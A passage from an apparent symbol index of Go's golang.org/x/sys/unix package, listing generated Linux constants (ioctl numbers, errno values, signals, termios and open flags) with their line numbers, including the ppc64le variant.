0x5412 constant TIOCSTOP (line 520) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 521) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 522) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 523) | TOSTOP = 0x400000 constant TUNATTACHFILTER (line 524) | TUNATTACHFILTER = 0x801054d5 constant TUNDETACHFILTER (line 525) | TUNDETACHFILTER = 0x801054d6 constant TUNGETDEVNETNS (line 526) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 527) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 528) | TUNGETFILTER = 0x401054db constant TUNGETIFF (line 529) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 530) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 531) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 532) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 533) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 534) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 535) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 536) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 537) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 538) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 539) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 540) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 541) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 542) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 543) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 544) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 545) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 546) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 547) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 548) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 549) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 550) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 551) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 552) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 553) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 554) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 555) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 556) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 557) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 558) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 559) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 560) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 561) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 562) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 563) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 564) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 565) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 566) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 567) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 568) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 569) | VDISCARD = 0x10 constant VEOF (line 570) | VEOF = 0x4 constant VEOL (line 571) | VEOL = 0x6 constant VEOL2 (line 572) | VEOL2 = 0x8 constant VMIN (line 573) | VMIN = 0x5 constant VREPRINT (line 574) | VREPRINT = 0xb constant VSTART (line 575) | VSTART = 0xd constant VSTOP (line 576) | VSTOP = 0xe constant VSUSP (line 577) | VSUSP = 0xc constant VSWTC (line 578) | VSWTC = 0x9 constant VT1 (line 579) | VT1 = 0x10000 constant VTDLY (line 580) | VTDLY = 0x10000 constant VTIME (line 581) | VTIME = 0x7 constant VWERASE (line 582) | VWERASE = 0xa constant WDIOC_GETBOOTSTATUS (line 583) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 584) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 585) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 586) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 587) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 588) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 589) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 590) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 591) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 592) | WORDSIZE = 0x40 constant XCASE (line 593) | XCASE = 0x4000 constant XTABS (line 594) | XTABS = 0xc00 constant _HIDIOCGRAWNAME (line 595) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 596) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 597) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 602) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 603) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 604) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 605) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 606) | EALREADY = syscall.Errno(0x72) constant EBADE (line 607) | EBADE = syscall.Errno(0x34) constant EBADFD (line 608) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 609) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 610) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 611) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 612) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 613) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 614) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 615) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 616) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 617) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 618) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 619) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 620) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 621) | EDEADLOCK = syscall.Errno(0x3a) constant EDESTADDRREQ (line 622) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 623) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 624) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 625) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 626) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 627) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 628) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 629) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 630) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 631) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 632) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 633) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 634) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 635) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 636) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 637) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 638) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 639) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 640) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 641) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 642) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 643) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 644) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 645) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 646) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 647) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 648) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 649) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 650) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 651) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 652) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 653) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 654) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 655) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 656) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 657) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 658) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 659) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 660) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 661) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 662) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 663) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 664) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 665) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 666) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 667) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 668) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 669) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 670) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 671) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 672) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 673) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 674) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 675) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 676) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 677) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 678) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 679) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 680) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 681) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 682) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 683) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 684) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 685) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 686) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 687) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 688) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 689) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 690) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 691) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 692) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 693) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 694) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 695) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 696) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 697) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 698) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 699) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 700) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 705) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 706) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 707) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 708) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 709) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 710) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 711) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 712) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 713) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 714) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 715) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 716) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 717) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 718) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 719) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 720) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 721) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 722) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 723) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 724) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 725) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_ppc64le.go constant B1000000 (line 14) | B1000000 = 0x17 constant B115200 (line 15) | B115200 = 0x11 constant B1152000 (line 16) | B1152000 = 0x18 constant B1500000 (line 17) | B1500000 = 0x19 constant B2000000 (line 18) | B2000000 = 0x1a constant B230400 (line 19) | B230400 = 0x12 constant B2500000 (line 20) | B2500000 = 0x1b constant B3000000 (line 21) | B3000000 = 0x1c constant B3500000 (line 22) | B3500000 = 0x1d constant B4000000 (line 23) | B4000000 = 0x1e constant B460800 (line 24) | B460800 = 0x13 constant B500000 (line 25) | B500000 = 0x14 constant B57600 (line 26) | B57600 = 0x10 constant B576000 (line 27) | B576000 = 0x15 constant B921600 (line 28) | B921600 = 0x16 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1f constant BS1 (line 55) | BS1 = 0x8000 constant BSDLY (line 56) | BSDLY = 0x8000 constant CBAUD (line 57) | CBAUD = 0xff constant CBAUDEX (line 58) | CBAUDEX = 0x0 constant CIBAUD (line 59) | CIBAUD = 0xff0000 constant CLOCAL (line 60) | CLOCAL = 0x8000 constant CR1 (line 61) | CR1 = 0x1000 constant CR2 (line 62) | CR2 = 0x2000 constant CR3 (line 63) | CR3 = 0x3000 constant CRDLY (line 64) | CRDLY = 0x3000 constant CREAD (line 65) | CREAD = 0x800 constant CS6 (line 66) | CS6 = 0x100 constant CS7 (line 67) | CS7 = 0x200 constant CS8 (line 68) | CS8 = 0x300 constant CSIZE (line 69) | CSIZE = 0x300 constant CSTOPB (line 70) | CSTOPB = 0x400 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x40 constant ECHOE (line 74) | ECHOE = 0x2 constant ECHOK (line 75) | ECHOK = 0x4 constant ECHOKE (line 76) | ECHOKE = 0x1 constant ECHONL (line 77) | ECHONL = 0x10 constant ECHOPRT (line 78) | ECHOPRT = 0x20 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000000 constant FF1 (line 83) | FF1 = 0x4000 constant FFDLY (line 84) | FFDLY = 0x4000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x800000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80086602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0x5 constant F_GETLK64 (line 96) | F_GETLK64 = 0xc constant F_GETOWN (line 97) | F_GETOWN = 0x9 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x6 constant F_SETLK64 (line 100) | F_SETLK64 = 0xd constant F_SETLKW (line 101) | F_SETLKW = 0x7 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0xe constant F_SETOWN (line 103) | F_SETOWN = 0x8 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x4000 constant ICANON (line 110) | ICANON = 0x100 constant IEXTEN (line 111) | IEXTEN = 0x400 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x800 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x80 constant IUCLC (line 116) | IUCLC = 0x1000 constant IXOFF (line 117) | IXOFF = 0x400 constant IXON (line 118) | IXON = 0x200 constant MAP_ANON (line 119) | MAP_ANON = 0x20 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x20 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x800 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x1000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x100 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x40000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x80 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x10000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x40 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x8000 constant MAP_STACK (line 129) | MAP_STACK = 0x20000 constant MAP_SYNC (line 130) | MAP_SYNC = 0x80000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x2000 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x4000 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x8000 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc0104d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc0104d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x40 constant NL2 (line 149) | NL2 = 0x200 constant NL3 (line 150) | NL3 = 0x300 constant NLDLY (line 151) | NLDLY = 0x300 constant NOFLSH (line 152) | NOFLSH = 0x80000000 constant NS_GET_NSTYPE (line 153) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 154) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 155) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 156) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 157) | OLCUC = 0x4 constant ONLCR (line 158) | ONLCR = 0x2 constant OTPERASE (line 159) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 160) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 161) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 162) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 163) | OTPSELECT = 0x40044d0d constant O_APPEND (line 164) | O_APPEND = 0x400 constant O_ASYNC (line 165) | O_ASYNC = 0x2000 constant O_CLOEXEC (line 166) | O_CLOEXEC = 0x80000 constant O_CREAT (line 167) | O_CREAT = 0x40 constant O_DIRECT (line 168) | O_DIRECT = 0x20000 constant O_DIRECTORY (line 169) | O_DIRECTORY = 0x4000 constant O_DSYNC (line 170) | O_DSYNC = 0x1000 constant O_EXCL (line 171) | O_EXCL = 0x80 constant O_FSYNC (line 172) | O_FSYNC = 0x101000 constant O_LARGEFILE (line 173) | O_LARGEFILE = 0x0 constant O_NDELAY (line 174) | O_NDELAY = 0x800 constant O_NOATIME (line 175) | O_NOATIME = 0x40000 constant O_NOCTTY (line 176) | O_NOCTTY = 0x100 constant O_NOFOLLOW (line 177) | O_NOFOLLOW = 0x8000 constant O_NONBLOCK (line 178) | O_NONBLOCK = 0x800 constant O_PATH (line 179) | O_PATH = 0x200000 constant O_RSYNC (line 180) | O_RSYNC = 0x101000 constant O_SYNC (line 181) | O_SYNC = 0x101000 constant O_TMPFILE (line 182) | O_TMPFILE = 0x404000 constant O_TRUNC (line 183) | O_TRUNC = 0x200 constant PARENB (line 184) | PARENB = 0x1000 constant PARODD (line 185) | PARODD = 0x2000 constant PENDIN (line 186) | PENDIN = 0x20000000 constant PERF_EVENT_IOC_DISABLE (line 187) | PERF_EVENT_IOC_DISABLE = 0x20002401 constant PERF_EVENT_IOC_ENABLE (line 188) | PERF_EVENT_IOC_ENABLE = 0x20002400 constant PERF_EVENT_IOC_ID (line 189) | PERF_EVENT_IOC_ID = 0x40082407 constant PERF_EVENT_IOC_MODIFY_ATTRIBUTES (line 190) | PERF_EVENT_IOC_MODIFY_ATTRIBUTES = 0x8008240b constant PERF_EVENT_IOC_PAUSE_OUTPUT (line 191) | PERF_EVENT_IOC_PAUSE_OUTPUT = 0x80042409 constant PERF_EVENT_IOC_PERIOD (line 192) | PERF_EVENT_IOC_PERIOD = 0x80082404 constant PERF_EVENT_IOC_QUERY_BPF (line 193) | PERF_EVENT_IOC_QUERY_BPF = 0xc008240a constant PERF_EVENT_IOC_REFRESH (line 194) | PERF_EVENT_IOC_REFRESH = 0x20002402 constant PERF_EVENT_IOC_RESET (line 195) | PERF_EVENT_IOC_RESET = 0x20002403 constant PERF_EVENT_IOC_SET_BPF (line 196) | PERF_EVENT_IOC_SET_BPF = 0x80042408 constant PERF_EVENT_IOC_SET_FILTER (line 197) | PERF_EVENT_IOC_SET_FILTER = 0x80082406 constant PERF_EVENT_IOC_SET_OUTPUT (line 198) | PERF_EVENT_IOC_SET_OUTPUT = 0x20002405 constant PPPIOCATTACH (line 199) | PPPIOCATTACH = 0x8004743d constant PPPIOCATTCHAN (line 200) | PPPIOCATTCHAN = 0x80047438 constant PPPIOCBRIDGECHAN (line 201) | PPPIOCBRIDGECHAN = 0x80047435 constant PPPIOCCONNECT (line 202) | PPPIOCCONNECT = 0x8004743a constant PPPIOCDETACH (line 203) | PPPIOCDETACH = 0x8004743c constant PPPIOCDISCONN (line 204) | PPPIOCDISCONN = 0x20007439 constant PPPIOCGASYNCMAP (line 205) | PPPIOCGASYNCMAP = 0x40047458 constant PPPIOCGCHAN (line 206) | PPPIOCGCHAN = 0x40047437 constant PPPIOCGDEBUG (line 207) | PPPIOCGDEBUG = 0x40047441 constant PPPIOCGFLAGS (line 208) | PPPIOCGFLAGS = 0x4004745a constant PPPIOCGIDLE (line 209) | PPPIOCGIDLE = 0x4010743f constant PPPIOCGIDLE32 (line 210) | PPPIOCGIDLE32 = 0x4008743f constant PPPIOCGIDLE64 (line 211) | PPPIOCGIDLE64 = 0x4010743f constant PPPIOCGL2TPSTATS (line 212) | PPPIOCGL2TPSTATS = 0x40487436 constant PPPIOCGMRU (line 213) | PPPIOCGMRU = 0x40047453 constant PPPIOCGRASYNCMAP (line 214) | PPPIOCGRASYNCMAP = 0x40047455 constant PPPIOCGUNIT (line 215) | PPPIOCGUNIT = 0x40047456 constant PPPIOCGXASYNCMAP (line 216) | PPPIOCGXASYNCMAP = 0x40207450 constant PPPIOCSACTIVE (line 217) | PPPIOCSACTIVE = 0x80107446 constant PPPIOCSASYNCMAP (line 218) | PPPIOCSASYNCMAP = 0x80047457 constant PPPIOCSCOMPRESS (line 219) | PPPIOCSCOMPRESS = 0x8010744d constant PPPIOCSDEBUG (line 220) | PPPIOCSDEBUG = 0x80047440 constant PPPIOCSFLAGS (line 221) | PPPIOCSFLAGS = 0x80047459 constant PPPIOCSMAXCID (line 222) | PPPIOCSMAXCID = 0x80047451 constant PPPIOCSMRRU (line 223) | PPPIOCSMRRU = 0x8004743b constant PPPIOCSMRU (line 224) | PPPIOCSMRU = 0x80047452 constant PPPIOCSNPMODE (line 225) | PPPIOCSNPMODE = 0x8008744b constant PPPIOCSPASS (line 226) | PPPIOCSPASS = 0x80107447 constant PPPIOCSRASYNCMAP (line 227) | PPPIOCSRASYNCMAP = 0x80047454 constant PPPIOCSXASYNCMAP (line 228) | PPPIOCSXASYNCMAP = 0x8020744f constant PPPIOCUNBRIDGECHAN (line 229) | PPPIOCUNBRIDGECHAN = 0x20007434 constant PPPIOCXFERUNIT (line 230) | PPPIOCXFERUNIT = 0x2000744e constant PROT_SAO (line 231) | PROT_SAO = 0x10 constant PR_SET_PTRACER_ANY (line 232) | PR_SET_PTRACER_ANY = 0xffffffffffffffff constant PTRACE_GETEVRREGS (line 233) | PTRACE_GETEVRREGS = 0x14 constant PTRACE_GETFPREGS (line 234) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETREGS64 (line 235) | PTRACE_GETREGS64 = 0x16 constant PTRACE_GETVRREGS (line 236) | PTRACE_GETVRREGS = 0x12 constant PTRACE_GETVSRREGS (line 237) | PTRACE_GETVSRREGS = 0x1b constant PTRACE_GET_DEBUGREG (line 238) | PTRACE_GET_DEBUGREG = 0x19 constant PTRACE_SETEVRREGS (line 239) | PTRACE_SETEVRREGS = 0x15 constant PTRACE_SETFPREGS (line 240) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETREGS64 (line 241) | PTRACE_SETREGS64 = 0x17 constant PTRACE_SETVRREGS (line 242) | PTRACE_SETVRREGS = 0x13 constant 